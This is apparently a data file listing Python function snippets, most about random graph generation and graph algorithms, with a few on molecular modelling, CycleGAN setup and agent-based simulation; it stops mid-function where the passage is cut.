"def initRandomGraph(ctor,n,m):\n\tg=ctor(n)\n\taddedEdges=0\n\twhile addedEdges < m:\n\t\tx=random.randrange(0,n)\n\t\ty=random.randrange(0,n)\n\t\tif not g.isEdge(x,y):\n\t\t\tg.addEdge(x,y)\n\t\t\taddedEdges+=1\n\treturn g",
"def create_reaction_graph(\n reactants_graph: dgl.DGLGraph,\n products_graph: dgl.DGLGraph,\n num_unchanged_bonds: int,\n num_lost_bonds: int,\n num_added_bonds: int,\n num_global_nodes: int = 0,\n) -> dgl.DGLGraph:\n\n # First add unchanged bonds and lost bonds from reactants\n rel = (\"atom\", \"bond\", \"atom\")\n src, dst = reactants_graph.edges(order=\"eid\", etype=rel)\n a2a = [(u, v) for u, v in zip(src, dst)]\n\n # Then add added bonds from products\n src, dst, eid = products_graph.edges(form=\"all\", order=\"eid\", etype=rel)\n for u, v, e in zip(src, dst, eid):\n # e // 2 because two edges for each bond\n if e // 2 >= num_unchanged_bonds:\n a2a.append((u, v))\n\n num_atoms = reactants_graph.num_nodes(\"atom\")\n edges_dict = {(\"atom\", \"bond\", \"atom\"): a2a}\n num_nodes_dict = {\"atom\": num_atoms}\n\n # global nodes\n if num_global_nodes > 0:\n a2v = []\n v2a = []\n for a in range(num_atoms):\n for v in range(num_global_nodes):\n a2v.append([a, v])\n v2a.append([v, a])\n\n edges_dict[(\"atom\", \"a2g\", \"global\")] = a2v\n edges_dict[(\"global\", \"g2a\", \"atom\")] = v2a\n num_nodes_dict[\"global\"] = num_global_nodes\n\n g = dgl.heterograph(edges_dict, num_nodes_dict=num_nodes_dict)\n\n return g",
"def __init__(self, graph: ghidra.graph.GImplicitDirectedGraph, metric: ghidra.graph.GEdgeWeightMetric):\n ...",
"def test_small_square_cyclical_graph(self):\n distance, path = Dijkstras().dijkstras(self.g4, 'a', 'b')\n self.assertEquals(distance, 2)\n self.assertTrue(path == ['a', 'c', 'b'] or path == ['a', 'd', 'b'],\n 'path was {} instead of {} or {}'.format(\n path,\n ['a', 'c', 'b'],\n ['a', 'd', 'b']))",
"def create_model(opts):\n G_XtoY = CycleGenerator(conv_dim=opts.g_conv_dim, init_zero_weights=opts.init_zero_weights)\n G_YtoX = CycleGenerator(conv_dim=opts.g_conv_dim, init_zero_weights=opts.init_zero_weights)\n D_X = DCDiscriminator(conv_dim=opts.d_conv_dim)\n D_Y = DCDiscriminator(conv_dim=opts.d_conv_dim)\n\n return G_XtoY, G_YtoX, D_X, D_Y",
"def test_get_generating_consuming(self):\n g0_graph = tf.Graph()\n with g0_graph.as_default():\n a0_tensor = tf.constant(1, name=\"a0\")\n b0_tensor = tf.constant(2, name=\"b0\")\n tf.add(a0_tensor, b0_tensor, name=\"c0\")\n g0 = gde.Graph(g0_graph)\n a0 = g0[\"a0\"].output(0)\n b0 = g0[\"b0\"].output(0)\n c0 = g0[\"c0\"].output(0)\n\n self.assertEqual(len(gde.util.get_generating_ops([a0, b0])), 2)\n self.assertEqual(len(gde.util.get_consuming_ops([a0, b0])), 1)\n self.assertEqual(len(gde.util.get_generating_ops([c0])), 1)\n self.assertEqual(gde.util.get_consuming_ops([c0]), [])",
"def random_sample(G):\n E = collections.defaultdict(list) # to store the new sampled preference list\n for student in G.A:\n pref_list = G.E[student]\n E[student] = pref_list[:] # store the pref list of student in E\n for elective in pref_list:\n E[elective].append(student)\n\n for elective in G.B:\n random.shuffle(G.E[elective])\n return graph.BipartiteGraph(G.A, G.B, E, G.capacities)",
"def graph_create(host, host_path):\n graphs = list()\n for name in dash_profile['graphs']:\n log.info(\" Graph: %s\" % name)\n graph = list()\n # Skip undefined graphs\n if name not in graphdef.keys():\n log.error(\"%s not found in graphdef.yml\" % name)\n continue\n # Graph Type #1: Host Metrics\n # Identified by filesytem globbing\n elif 'glob_verify' in graphdef[name].keys():\n # Determine and test metric paths\n if 'glob_metrics' in graphdef[name].keys():\n glob_metrics = graphdef[name]['glob_metrics']\n metric_verify = True\n else:\n glob_metrics = graphdef[name]['glob_verify']\n metric_verify = False\n metric_glob = \"%s/%s\" % (host_path, glob_metrics)\n metric_paths = glob.glob(metric_glob)\n if len(metric_paths) <= 0:\n continue\n metric_paths.sort()\n for metric_path in metric_paths:\n graph_object = dict(graphdef[name])\n # Verify metric path\n if metric_verify:\n verify_glob = \"%s/%s\" % (metric_path,\n graphdef[name]['glob_verify'])\n del(graph_object['glob_metrics'])\n else:\n verify_glob = metric_path\n if len(glob.glob(verify_glob)) != 1:\n continue\n del(graph_object['glob_verify'])\n metric = os.path.basename(metric_path)\n log.debug(\" metric: %s\" % metric)\n graph = graph_compile(host, name, graph_object, metric)\n if len(graph) > 0:\n graphs.append(graph)\n # Graph Type #2: Carbon Match\n # Metrics reported directly by carbon server to itself\n elif ('carbon_match' in graphdef[name].keys() and\n graphdef[name]['carbon_match'] and\n host == dashconf['carbon_match']):\n graph_object = dict(graphdef[name])\n del graph_object['carbon_match']\n graph = graph_compile(dashconf['carbon_server'], name,\n graph_object, None)\n if len(graph) > 0:\n graphs.append(graph)\n return graphs",
"def set_random_gn_graph(self, num_nodes, num_edges=None, degree_s=[None, None]):\n # remove the current graph first\n self.clear()\n\n if num_edges is None:\n num_edges = int((num_nodes ** 2 / 4))\n #\n # first create a GN graph\n\n #G = nx.gn_graph(num_nodes)\n G = nx.gn_graph(num_nodes)\n H = nx.DiGraph()\n for u, v in G.edges():\n H.add_edge(v, u, weight=1)\n G = H\n for u, v in G.edges():\n G[u][v]['weight'] = 1\n\n nodes = nx.topological_sort(G)\n num_edges = num_edges - G.number_of_edges()\n for i in range(num_edges):\n u_idx = random.choice(range(len(nodes)-1))\n u = nodes[u_idx]\n v = random.choice(nodes[u_idx+1:])\n if (u,v) in G.edges():\n G[u][v]['weight'] += 1\n else:\n G.add_edge(u, v, weight=1)\n\n self.set_random_session(G, degree_s)",
"def random_graph(N, deg_sampler, directed=True,\n parallel_edges=False, self_loops=False, block_membership=None,\n block_type=\"int\", degree_block=False,\n random=True, verbose=False, **kwargs):\n\n g = Graph()\n\n if (type(block_membership) is types.FunctionType or\n type(block_membership) is types.LambdaType):\n btype = block_type\n bm = []\n if len(inspect.getargspec(block_membership)[0]) == 0:\n for i in range(N):\n bm.append(block_membership())\n else:\n for i in range(N):\n bm.append(block_membership(i))\n block_membership = bm\n elif block_membership is not None:\n btype = _gt_type(block_membership[0])\n\n if len(inspect.getargspec(deg_sampler)[0]) > 0:\n if block_membership is not None:\n sampler = lambda i: deg_sampler(i, block_membership[i])\n else:\n sampler = deg_sampler\n else:\n sampler = lambda i: deg_sampler()\n\n libgraph_tool_generation.gen_graph(g._Graph__graph, N, sampler,\n not parallel_edges,\n not self_loops, not directed,\n _get_rng(), verbose, True)\n g.set_directed(directed)\n\n if degree_block:\n if btype in [\"object\", \"string\"] or \"vector\" in btype:\n btype = \"object\"\n elif btype in [\"int\", \"int32_t\", \"bool\"]:\n btype = \"vector<int32_t>\"\n elif btype in [\"long\", \"int64_t\"]:\n btype = \"vector<int64_t>\"\n elif btype in [\"double\"]:\n btype = \"vector<double>\"\n elif btype in [\"long double\"]:\n btype = \"vector<long double>\"\n\n if block_membership is not None:\n bm = g.new_vertex_property(btype)\n if btype in [\"object\", \"string\"] or \"vector\" in btype:\n for v in g.vertices():\n if not degree_block:\n bm[v] = block_membership[int(v)]\n else:\n if g.is_directed():\n bm[v] = (block_membership[int(v)], v.in_degree(),\n v.out_degree())\n else:\n bm[v] = (block_membership[int(v)], v.out_degree())\n else:\n try:\n bm.a = block_membership\n except ValueError:\n bm = g.new_vertex_property(\"object\")\n for v in g.vertices():\n bm[v] = block_membership[int(v)]\n else:\n bm = None\n\n if random:\n g.set_fast_edge_removal(True)\n random_rewire(g, parallel_edges=parallel_edges,\n self_loops=self_loops, verbose=verbose,\n block_membership=bm, **kwargs)\n g.set_fast_edge_removal(False)\n\n if bm is None:\n return g\n else:\n return g, bm",
"def set_random_dag(self, num_nodes, num_edges=None, degree_s=[None, None]):\n # first create a DAG with num_nodes number of nodes by randomly pack\n # adjacency matrix which is lower triangular\n # this may not be the best way\n # how to generate MultiDigraph?\n if num_edges is None:\n num_edges = int((num_nodes ** 2 / 4))\n\n while True:\n adj_matrix = np.zeros((num_nodes, num_nodes))\n\n positions = []\n for i in range(num_nodes):\n for j in range(i+1, num_nodes):\n positions.append((i,j))\n\n # create random edges\n rand_idx = [random.randint(0, len(positions)-1) for x in range(num_edges)]\n for i in rand_idx:\n a, b = positions[i]\n adj_matrix[a][b] += 1\n\n # Done with adjacency matrix\n G = nx.from_numpy_matrix(adj_matrix, create_using=nx.DiGraph())\n\n if nx.is_connected(nx.Graph(G)):\n break\n\n self.set_random_session(G, degree_s)",
"def generate_cfg(numStart, numNonterminals, numTerminals, numProductions, min_length, max_length, onlyunaryterminal,\n terminalprob, minrhs):\n grammar = cfg.ContextFreeGrammar()\n if numTerminals == -1:\n terminals = list(dictionary.generateDictionary(numProductions * max_length))\n else:\n terminals = list(dictionary.generateDictionary(numTerminals))\n nonterminals = []\n terminalCounter = 0\n start = []\n if numStart == 1:\n start.append(\"S\")\n else:\n for i in xrange(numStart):\n start.append(\"S_\" + str(i))\n for s in start:\n nonterminals.append(s)\n vcup = []\n for terminal in terminals:\n vcup.append(terminal)\n for i in range(numNonterminals - numStart):\n nt = \"NT\" + str(i)\n nonterminals.append(nt)\n vcup.append(nt)\n productionSet = set()\n obligatoryrhs = []\n for x in xrange(minrhs):\n for nt in nonterminals:\n obligatoryrhs.append(nt)\n while len(productionSet) < numProductions:\n if len(productionSet) < len(obligatoryrhs):\n lhs = obligatoryrhs[len(productionSet)]\n else:\n lhs = random.choice(nonterminals)\n rhs = []\n rhslength = random.randrange(min_length, max_length + 1)\n # print rhslength\n if rhslength == 1 and onlyunaryterminal:\n if numTerminals == -1:\n rhs.append(terminals[terminalCounter])\n terminalCounter += 1\n else:\n rhs.append(random.choice(terminals))\n else:\n for i in range(rhslength):\n if random.random() < terminalprob:\n if numTerminals == -1:\n rhs.append(terminals[terminalCounter])\n terminalCounter += 1\n else:\n rhs.append(random.choice(terminals))\n else:\n rhs.append(random.choice(nonterminals))\n prod = (lhs, tuple(rhs))\n if not prod in productionSet:\n productionSet.add(prod)\n # print prod\n for nt in nonterminals:\n n = 0\n for lhs, rhs in productionSet:\n for sym in rhs:\n if sym == nt:\n break\n else:\n # not on the rhs of any nonterminal.\n while True:\n lhs = random.choice(nonterminals)\n if lhs != nt:\n rhslength = random.randrange(min_length, max_length + 1)\n if rhslength == 1 and not onlyunaryterminal:\n productionSet.add((lhs, (nt,)))\n break\n elif rhslength > 1:\n position = random.choice(range(rhslength))\n rhs = []\n for i in range(rhslength):\n if i == position:\n rhs.append(nt)\n else:\n if random.random() < terminalprob:\n if numTerminals == -1:\n rhs.append(terminals[terminalCounter])\n terminalCounter += 1\n else:\n rhs.append(random.choice(terminals))\n else:\n rhs.append(random.choice(nonterminals))\n productionSet.add((lhs, tuple(rhs)))\n\n # now we have the set of weighted productions.\n grammar.productions = productionSet\n grammar.nonterminals = nonterminals\n grammar.terminals = terminals\n grammar.start_set = start\n return grammar.trim()",
"def build_drop_fullgraphs(self, do_subgraph=False, graph_lib='pygraphviz'):\n if 'pygraphviz' == graph_lib:\n G = pgv.AGraph(strict=True, directed=True)\n else:\n G = nx.Graph()\n do_subgraph = False\n subgraph_dict = defaultdict(list) # k - node-ip, v - a list of graph nodes\n oid_gnid_dict = dict()\n\n for i, oid in enumerate(self.pg_spec.keys()):\n oid_gnid_dict[oid] = str(i)\n logger.info(\"oid to gid mapping done\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n ip = dropspec['node']\n subgraph_dict[ip].append(gid)\n if (dropspec['type'] == 'app'):\n G.add_node(gid, shape='rect', label='')#, fixedsize=True, hight=.05, width=.05)\n elif (dropspec['type'] == 'plain'): #parallelogram\n G.add_node(gid, shape='circle', label='')#, fixedsize=True, hight=.05, width=.05)\n logger.info(\"Graph nodes added\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n if (dropspec['type'] == 'app'):\n ds_kw = 'outputs' #down stream key word\n elif (dropspec['type'] == 'plain'):\n ds_kw = 'consumers'\n else:\n ds_kw = 'None'\n if (ds_kw in dropspec):\n for doid in dropspec[ds_kw]:\n G.add_edge(gid, oid_gnid_dict[doid])\n logger.info(\"Graph edges added\")\n\n if (do_subgraph):\n for i, subgraph_nodes in enumerate(subgraph_dict.values()):\n # we don't care about the subgraph label or rank\n subgraph = G.add_subgraph(subgraph_nodes, label='%d' % i, name=\"cluster_%d\" % i, rank=\"same\")\n subgraph.graph_attr['rank']='same'\n logger.info(\"Subgraph added\")\n\n return G",
"def simulate_graph(seed, cluster_sizes, del_factor, ins_factor):\n rand.seed(seed)\n cluster_boundaries = np.cumsum(cluster_sizes)\n print(\"#seed:\", seed)\n print(\"#deletion factor:\", del_factor)\n print(\"#insertion factor:\", ins_factor)\n optimal_costs = np.array([0])\n for c in range(0, len(cluster_sizes)-1):\n n_c = cluster_sizes[c+1]\n offset_c = cluster_boundaries[c]\n edges_c = generate_edges(n_c, offset_c)\n disturb_cluster(n_c, offset_c, edges_c, del_factor, optimal_costs)\n additional_edges(cluster_boundaries, ins_factor, optimal_costs)\n print(\"#optimal costs:\", optimal_costs)",
"def hyperbolic_generator():\n\n hyperbolicRadius = np.arccosh(1 + N / (2 * np.pi * pointDensity))\n hyperbolicThreshold = np.arccosh(1 + thresholdFrac * (np.cosh(hyperbolicRadius) - 1))\n\n data_hyperbolic = []\n for r in range(num_graphs):\n # generates dictionary of positions (in a circle of radius) for each node: node_pos = {node_i: (radius, theta)} <-- uses polar coordinates\n # uses the inversion sampling idea to give Euclidean radii sampled uniformly across a hyperbolic sheet\n node_pos = {}\n for i in range(N):\n rnd_angle = np.random.random() * 2 * np.pi\n p = np.random.random() # random float between 0 and 1\n rnd_radii = np.arccosh(1 + p * (np.cosh(hyperbolicRadius) - 1)) # <-- inversion sampling\n node_pos.update({i: (rnd_radii, rnd_angle)})\n\n # computes the adjacency matrix\n Adj_Matrix = np.zeros((N, N))\n for i in range(N):\n for j in range(N):\n ij_dist = hyp_dist(node_pos[i], node_pos[j])\n if ij_dist < hyperbolicThreshold:\n Adj_Matrix[i, j] = 1 # nodes that are connected are assigned a 1 in the matrix\n\n data_hyperbolic.append(Adj_Matrix)\n\n return data_hyperbolic",
"def graph_connectome(\n num_sampled,\n max_depth,\n num_iters=10,\n graph=None,\n reverse_graph=None,\n to_write=None,\n num_cpus=1,\n a_indices=None,\n b_indices=None,\n):\n num_a, num_b = to_write\n\n if a_indices is None:\n a_indices = np.array([i for i in range(num_a)])\n if b_indices is None:\n b_indices = np.array([i for i in range(num_b)])\n\n def random_var_gen(iter_val):\n start = np.random.choice(a_indices, size=num_sampled[0], replace=False)\n end = np.random.choice(b_indices, size=num_sampled[1], replace=False)\n end = end + num_a\n\n return start, end\n\n def fn_to_eval(start, end):\n return (\n len(find_connected_limited(graph, start, end, max_depth, reverse_graph)),\n )\n\n result = monte_carlo(fn_to_eval, random_var_gen, num_iters, num_cpus=num_cpus)\n df = list_to_df(\n result,\n [\"Connections\"],\n )\n result = summarise_monte_carlo(\n df,\n plot=False,\n )\n ordered_dist = get_distribution(df, \"Connections\", num_iters)\n\n return {\n \"full_results\": df,\n \"summary_stats\": result,\n \"dist\": ordered_dist,\n }",
"def create_random_graph(number_of_vertices, number_of_edges, radius, thickness):\n\n global screen\n dist_apart = radius * 3\n\n for i in range(0, number_of_vertices):\n vtx_x, vtx_y = generate_valid_coordinates(radius, dist_apart)\n \n vtx = {\"ID\": i,\n \"x\": vtx_x,\n \"y\": vtx_y,\n \"color\": \"WHITE\",\n \"adjacent\": [],\n }\n\n VERTICES.append(vtx);\n\n # Assign adjacency\n for i in range(0, number_of_edges):\n vtx_one = None\n vtx_two = None\n\n while vtx_one is vtx_two:\n vtx_one = random.randint(0, number_of_vertices - 1)\n vtx_two = random.randint(0, number_of_vertices - 1)\n\n VERTICES[vtx_one][\"adjacent\"].append(VERTICES[vtx_two][\"ID\"])\n VERTICES[vtx_two][\"adjacent\"].append(VERTICES[vtx_one][\"ID\"])\n\n draw_graph(VERTICES, RADIUS, THICKNESS)",
"def configuration_model(g, kmin, kmax, size, c, offset):\n # Makes sure that networks have an even number of half-edges, since\n # the number of half-edges prepared for linking can be uneven.\n its = inverse_transform_sampling(g, kmin, kmax, size, offset)\n sum_its = sum(its)\n while sum_its % 2 != c % 2:\n its = inverse_transform_sampling(g, kmin, kmax, size, offset)\n sum_its = sum(its)\n\n # Brings the dist. seq. into the half-edge form,\n # e.g. [1,2,3] -> [0,1,1,2,2,2]\n seq = []\n k = 0\n for i in range(size):\n for j in range(k, k + its[i]):\n seq += [i]\n k += 1\n\n # Edges that link to other modules\n c_node = np.random.choice(seq, size=c, replace=False)\n for i in range(c):\n seq.remove(c_node[i])\n \n # Connects the half-edges randomly among each other\n np.random.shuffle(seq)\n links = np.sort(np.reshape(seq, (int(len(seq)/2), 2)))\n links = links.tolist()\n \n # Separates the unique and the multi/self links.\n # The list links is left with multi and self links.\n links_unique = []\n k = 0\n while k < len(links):\n if links[k][0] != links[k][1] and links[k] not in links_unique:\n links_unique.append(links.pop(k))\n else:\n k += 1\n \n # Rewires the multi/self links\n for multi in links:\n r1 = random.randint(0, len(links_unique)-1)\n r2 = random.randint(0, 1)\n r3 = random.randint(0, 1)\n links_unique[r1][r2], multi[r3] = multi[r3], links_unique[r1][r2]\n \n network = gt.Graph(directed=False)\n network.add_edge_list(links_unique)\n network.add_edge_list(links)\n\n gt.stats.remove_parallel_edges(network)\n gt.stats.remove_self_loops(network)\n \n return network, c_node",
"def choose_random(self, exclude):\n other_edges = list(set(self.vertices()) - set(exclude))\n return random.choice(other_edges)",
"def generate_random_DC_single_force_coupled_tensor():\n # 1. --- Specify DC moment tensor to rotate ---:\n DC_MT_to_rot = np.vstack(([0.,0.,1.],[0.,0.,0.], [1.,0.,0.])) # DC moment tensor\n # 2. --- Specify single force 3-vector in same direction as slip of DC solution ---:\n NED_single_force_vector_to_rotate = np.array([1.,0.,0.], dtype=float)\n # 3. --- Rotate DC moment tensor and single force by same random rotation on sphere:\n # 3.a. Get a random sample 3-vector on a 3-unit sphere to use to calculate random theta and phi rotation angles:\n a_unnormalised = np.array([np.random.normal(loc=0.0, scale=1.0), np.random.normal(loc=0.0, scale=1.0), np.random.normal(loc=0.0, scale=1.0)], dtype=float) # Generate 3 indepdendent normal deviates\n a_normalised = a_unnormalised/(np.sum(a_unnormalised**2)**-0.5) # Normallise sample onto unit 3-sphere - As in Muller (1959)\n # And normallise so that vector magnitude = 1:\n a_normalised = a_normalised/((np.sum(a_normalised**2))**0.5)\n x = a_normalised[0]\n y = a_normalised[1]\n z = a_normalised[2]\n theta = np.arctan2(np.sqrt((x**2)+(y**2)),z) #np.arccos(z)\n phi = np.arctan2(y,x) #np.arccos(x/np.sin(theta))\n # 3.b. Rotate DC moment tensor by random 3D angle:\n random_DC_MT = rot_mt_by_theta_phi(DC_MT_to_rot, theta, phi)\n random_DC_six_MT = get_six_MT_from_full_MT_array(random_DC_MT)\n random_DC_six_MT_normalised = random_DC_six_MT/((np.sum(random_DC_six_MT**2))**0.5) # And normallise so that moment tensor magnitude = 1\n random_DC_six_MT_normalised = np.reshape(random_DC_six_MT_normalised, (6, 1)) # And set to correct dimensions (so matrix multiplication in forward model works correctly)\n # 3.c. Rotate Single force 3-vector by the same random 3D angle:\n random_coupled_NED_single_force = rot_single_force_by_theta_phi(NED_single_force_vector_to_rotate, theta, phi)\n random_coupled_single_force = np.array([random_coupled_NED_single_force[1], random_coupled_NED_single_force[0], random_coupled_NED_single_force[2]]) # Convert single force from NED coords to END coords (as that is what greens functions are in)\n random_coupled_single_force = np.reshape(random_coupled_single_force, (3, 1))\n # 4. --- Get random fraction amplitude DC and single force components (sum of amplitudes is to 1) ---:\n random_amp_frac = random.random() # random number between 0. and 1.\n random_DC_six_MT_normalised = random_DC_six_MT_normalised*random_amp_frac\n random_coupled_single_force = random_coupled_single_force*(1.-random_amp_frac)\n # 5. --- Finally combine to tensor of length 9 ---:\n random_DC_single_force_coupled_tensor = np.vstack((random_DC_six_MT_normalised, random_coupled_single_force))\n return random_DC_single_force_coupled_tensor, random_amp_frac",
"def gen_graph(self, seed=None):\n graph = _branched_graph(\"dum\", self.bfact, self.levels)\n graph = _random_replace_nodes_attribute(graph, self.residues,\n self.weights, \"resname\", seed)\n return graph",
"def generate_random_graph(num_nodes):\n root = Node()\n nodes = set([root])\n edge_count = 0\n num_edges = int(math.log(num_nodes, 1.7)) * num_nodes\n\n for i in range(1, num_nodes):\n node = Node()\n node.edges.add(random.sample(nodes, 1)[0])\n nodes.add(node)\n edge_count += 1\n\n # Generate edges until \n for j in range(edge_count, num_edges):\n tail, head = random.sample(nodes, 2)\n while head in tail.edges:\n tail, head = random.sample(nodes, 2)\n tail.edges.add(head)\n edge_count += 1\n \n # Convert our graph to CSR representation by first creating an adjacency\n # matrix and then transforming it to a CSR\n\n # Generating adjacency matrix\n adjacency_matrix = [[0] * num_nodes for i in range(num_nodes)]\n sums = defaultdict(int)\n stack = [root]\n visited = set()\n while stack:\n curr = stack.pop()\n if curr not in visited:\n visited.add(curr)\n for node in curr.edges:\n stack.append(node)\n adjacency_matrix[curr.id][node.id] = 1.0\n sums[curr.id] += 1\n\n # Adjacency matrix -> CSR\n offset = 0\n csr = [[] for i in range(3)]\n nonzeros = np.nonzero(adjacency_matrix)\n last_row = -1\n for i in range(len(nonzeros[0])):\n row = nonzeros[0][i]\n col = nonzeros[1][i]\n outdegree = sums[row]\n if last_row != row:\n csr[1].append(offset)\n csr[0].append(adjacency_matrix[row][col] / outdegree)\n csr[2].append(col)\n offset += 1\n last_row = row\n csr[1].append(offset)\n\n # Write to txt and pickle\n with open(generate_filepath_txt(num_nodes), \"w\") as fp:\n fp.write(' '.join(str(i) for i in csr[0]) + '\\n')\n fp.write(' '.join(str(i) for i in csr[1]) + '\\n')\n fp.write(' '.join(str(i) for i in csr[2]))\n with open(generate_filepath_pickle(num_nodes), \"wb\") as fp:\n pickle.dump(csr, fp)",
"def generate_model(self):\n rootpath = 'c:\\\\Users\\\\Gamelab\\\\Desktop\\\\RT\\\\Others\\\\Thesis\\\\Thesis_coding\\\\ABM\\\\' \n \n df = pd.read_csv(rootpath+'data\\\\subset_initialized_latlonvalues.csv')\n df = df.drop(columns='Unnamed: 0')\n households_in_block = {}\n household_ids_in_block = {}\n # holds all the graphs indexed by blockid [geoid]\n \n def add_and_remove_edges(G, p_new_connection, p_remove_connection): \n\n new_edges = [] \n rem_edges = [] \n for node in G.nodes(): \n # find the other nodes this one is connected to \n connected = [to for (fr, to) in G.edges(node)] \n # and find the remainder of nodes, which are candidates for new edges \n unconnected = [n for n in G.nodes() if not n in connected] \n\n # probabilistically add a random edge \n if len(unconnected): # only try if new edge is possible \n if random.random() < p_new_connection: \n new = random.choice(unconnected) \n G.add_edge(node, new) \n #print(\"\\tnew edge:\\t {} -- {}\".format(node, new) \n new_edges.append( (node, new) ) \n # book-keeping, in case both add and remove done in same cycle \n unconnected.remove(new) \n connected.append(new) \n\n # probabilistically remove a random edge \n if len(connected): # only try if an edge exists to remove \n if random.random() < p_remove_connection: \n remove = random.choice(connected) \n G.remove_edge(node, remove) \n #print \"\\tedge removed:\\t {} -- {}\".format(node, remove) \n rem_edges.append( (node, remove) ) \n # book-keeping, in case lists are important later? \n connected.remove(remove) \n unconnected.append(remove) \n return rem_edges, new_edges\n\n\n\n\n #now i need to get number of geoids unique \n for block in df['geoid'].unique(): \n G_temp=nx.Graph()\n households_in_block[block] = df[df['geoid']==block] # contains all the information about the households \n household_ids_in_block[block] = df[df['geoid']==block]['CASE_ID'].values \n # contains only their ID\n # you only need id to initialize a node\n tempdf = households_in_block[block]\n for household in household_ids_in_block[block]:\n lon = tempdf.loc[tempdf['CASE_ID']==household,'lon'].values[0]\n lat = tempdf.loc[tempdf['CASE_ID']==household,'lat'].values[0] \n \n G_temp.add_node(str(household), pos=(lon,lat))\n self.G.add_node(str(household), pos=(lon,lat))\n \n ## add G to the dictionary\n self.graph_dict[block] = G_temp\n \n \n rem_edges, new_edges = add_and_remove_edges(self.G, 0.5, 0.5)\n self.G.remove_edges_from(rem_edges)\n self.G.add_edges_from(new_edges)\n\n \n\n self.grid= NetworkGrid(self.G)\n \n for _, row in df.iterrows(): # index, row in ...\n \n agent = Household(unique_id = str(row['CASE_ID']),\n model = self, \n income = row['income'],\n age= row['age'],\n size= row['household_'],\n ami_category = row['ami_categ'],\n elec_consumption= row['elec_consumption'],\n attitude = row['attitude'],\n pbc = row['pbc'],\n subnorms = row['subnorms'],\n geoid = row['geoid'],\n tract = row['tract'],\n bgid = row['bgid'],\n adoption_status = 0)\n \n \n\n if agent:\n self.schedule.add(agent)\n y = row['lat']\n x = row['lon']\n self.grid.place_agent(agent, node_id=agent.unique_id)\n #self.space.place_agent(agent, (x, y))\n #agent.pos = (x, y)",
"def check_for_isomorphism(graph1: list, graph2: list, directed=False) -> bool:\n matrix1 = get_adjancy_matrix(graph1, directed)\n matrix2 = get_adjancy_matrix(graph2, directed)\n\n if num_vertices(matrix1, matrix2):\n if num_edges(matrix1, matrix2):\n degrees = vertices_degree(matrix1, matrix2)\n if degrees[0]:\n return permutations(matrix1, matrix2, degrees[1:])\n return False",
"def generate_N_doping(path, N_graphitic, N_pyridinic, N_pyrrolic, filename1):\n global bond_list\n bond_list = bond_list_1 + bond_list_3\n atom_list = read_in_graphene(path)\n rings = find_rings(atom_list)\n bond_list = bond_list_1 + bond_list_3\n map_3, map_2, map_2n = filter_carbon_atoms(atom_list, rings)\n graphitic = N_graphitic \n pyridinic = N_pyridinic\n pyrrolic = N_pyrrolic\n attempt = len(atom_list) / 10\n choices = [1, 2, 3]\n while (((N_graphitic > 0) or (N_pyridinic > 0) or (N_pyrrolic > 0)) and (attempt > 0)):\n print(\"Left to add: \", \"N_graphitic \", N_graphitic, \"N_pyridinic \", N_pyridinic, \"N_pyrrolic \", N_pyrrolic)\n if (N_graphitic == 0):\n try:\n choices.remove(1)\n except:\n pass\n if (N_pyridinic == 0):\n try:\n choices.remove(2)\n except:\n pass\n if (N_pyrrolic == 0):\n try:\n choices.remove(3)\n except:\n pass\n choice = random.choice(choices)\n if (choice == 1):\n while ((N_graphitic > 0) and (len(map_3) > 0)):\n random_atom = random.choice(map_3)\n N_graphitic -= 1\n N = Atom(random_atom.atom_number, \"N3\", \"N3A\", str(graphitic - N_graphitic), float(\"{0:.3f}\".format(random_atom.x)), float(\"{0:.3f}\".format(random_atom.y)), float(\"{0:.3f}\".format(random_atom.z)))\n if ((len(identify_bonds(random_atom, atom_list)) == 3) and ((identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CX\") or (identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CY\")) and ((identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CX\") or identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CY\") and ((identify_bonds(random_atom, atom_list)[2][0].atom_name == \"CX\") or (identify_bonds(random_atom, atom_list)[2][0].atom_name == \"CY\"))):\n for ring in rings:\n if (random_atom in ring):\n for atom in ring:\n try:\n map_3.remove(atom)\n except:\n pass\n try:\n map_2.remove(atom)\n except:\n pass\n try:\n map_2n.remove(atom)\n except:\n pass\n try:\n atom_list.remove(random_atom)\n except:\n pass\n atom_list.append(N)\n else:\n attempt -= 1\n elif (choice == 2):\n while ((N_pyridinic > 0) and (len(map_2) > 0)): \n random_atom = random.choice(map_2)\n N_pyridinic -= 1\n N = Atom(random_atom.atom_number, \"N2\", \"N2A\", str(pyridinic - N_pyridinic), float(\"{0:.3f}\".format(random_atom.x)), float(\"{0:.3f}\".format(random_atom.y)), float(\"{0:.3f}\".format(random_atom.z)))\n if ((len(identify_bonds(random_atom, atom_list)) == 2) and ((identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CX\") or (identify_bonds(random_atom, atom_list)[0][0].atom_name == \"CY\")) and ((identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CX\") or identify_bonds(random_atom, atom_list)[1][0].atom_name == \"CY\") ):\n found = False\n for ring in rings:\n if (random_atom in ring):\n found = True\n for atom in ring:\n try:\n map_3.remove(atom)\n except:\n pass\n try:\n map_2.remove(atom)\n except:\n pass\n try:\n map_2n.remove(atom)\n except:\n pass\n if (found == False):\n try:\n map_3.remove(random_atom)\n except:\n pass\n try:\n map_2.remove(random_atom)\n except:\n pass\n try:\n map_2n.remove(random_atom)\n except:\n pass\n atom_list.remove(random_atom)\n atom_list.append(N)\n else:\n attempt -= 1\n else: \n attempt -= 1\n elif (choice == 3):\n while ((N_pyrrolic > 0) and (len(map_2n) > 0)):\n random_atom_1 = random.choice(map_2n)\n for neighbour in identify_bonds(random_atom_1, atom_list):\n if (len(identify_bonds(neighbour[0], atom_list)) == 2):\n random_atom_2 = neighbour[0]\n break\n for ring in rings:\n if (random_atom_1 in ring):\n center_6 = {}\n 
